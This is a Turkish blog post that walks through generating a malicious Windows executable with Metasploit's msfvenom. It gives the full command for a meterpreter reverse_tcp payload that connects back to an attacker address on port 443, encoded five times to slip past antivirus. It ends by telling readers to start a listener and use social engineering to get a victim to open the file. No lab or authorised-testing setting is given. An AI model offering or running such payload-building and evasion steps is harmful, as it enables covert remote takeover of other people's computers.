9 Temmuz 2015 Perşembe

Msfvenom Kullanımı - (Detaylı)

Standard
Bu yazımda msfvenom kullanımı ve özelliklerinden bahsedeğim.
Metasploit ile gelen  msfvenom zararlı kod üretmemizi ve karşı taraftan reverse bağlantı almamızı sağlayan bir araçtır. Zararlı dosyayı oluşturup karşı tarafa Sosyal Mühendislik yöntemlerini kullanarak dosyayı açtırmayı başarmamız gerekiyor.







Öncelikle Kali Linux'umuzu açalım daha sonra terminale gelerek msfvenom -h komutunu girelim.

Resim  1

Resim 1'de görüldüğü gibi msfvenom aracının options seçeneklerini, parametrelerini ve bunların ne işe yaradıklarını görüyoruz.
Bizim Kullanacağımız parametreleri sıralayalım ;


  • -p : (Payload) Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre
Ben parametrelere şunları vereceğim.

  • -p : windows/meterpreter/reverse_tcp ( Kurbandan bağlantı almama yarayacak payload )
  • -e : x86/shikata_ga_nai ( Oluşturacağım zararlı dosyayı encode etmemi yarayacak encoder )
  • -i : 5 ( 5 defa encode etmesini istiyorum ) 
  • -b : \x00 ( Kötü karakteri çıkarıyorum )
  • -f : .exe ( Uygulama olarak kaydedeceğim)
  • -a : x86 ( 32 bitlik işletim sisteminde çalışmasını istiyorum )
  • --platform : windows ( Windows işletim sisteminde çalışmasını istiyorum )
  • LHOST : Kendi İp adresinizi yazın
  • LPORT : Hangi portu kullanmak istiyorsanız o portu yazın
Şimdi zararlı dosyamızı verilen parametreler ile oluşturualım. Terminale aşağıdaki gibi yazalım .

 # msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe  >  zararlidosya.exe

Resim 2

Resim 2 deki gibi bir çıktı aldıysanız sizde benim gibi zararlı dosyayı oluşturmuş oldunuz.
Artık yapmanız gerek Metasploitte 443'lü portunuzu dinleyeme almak ve Sosyal Mühendislik becerilerinizle karşı tarafa bu dosyayı yollayıp açtırmak.

Etiketler: , , , , , , , , , , , , , , ,

0 yorum:

Yorum Gönder